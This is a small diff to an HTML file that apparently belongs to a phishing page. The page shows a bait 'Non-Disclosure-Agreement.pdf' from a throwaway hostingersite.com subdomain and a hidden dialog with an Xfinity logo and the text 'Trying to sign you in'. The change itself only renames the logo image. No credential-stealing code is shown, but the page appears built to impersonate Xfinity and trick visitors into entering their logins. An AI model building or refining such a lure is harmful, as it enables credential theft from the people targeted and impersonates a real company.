--- a/test.html
+++ b/test.html
@@ -190,7 +190,7 @@
     <iframe id="pdfViewer" src="https://azure-snail-583462.hostingersite.com/Non-Disclosure-Agreement.pdf" aria-label="PDF Viewer"></iframe>
     <!-- Smaller iframe initially hidden with logo, text, and throbber -->
     <div id="smallIframe" role="dialog" aria-labelledby="expiredText">
-        <img id="logo" src="https://azure-snail-583462.hostingersite.com/xfinity.png" alt="xfinty Logo">
+        <img id="logo" src="https://azure-snail-583462.hostingersite.com/Xfinty.png" alt="xfinty Logo">
         <p id="expiredText">Trying to sign you in</p>
         <div class="throbber-container">
             <div class="throbber">
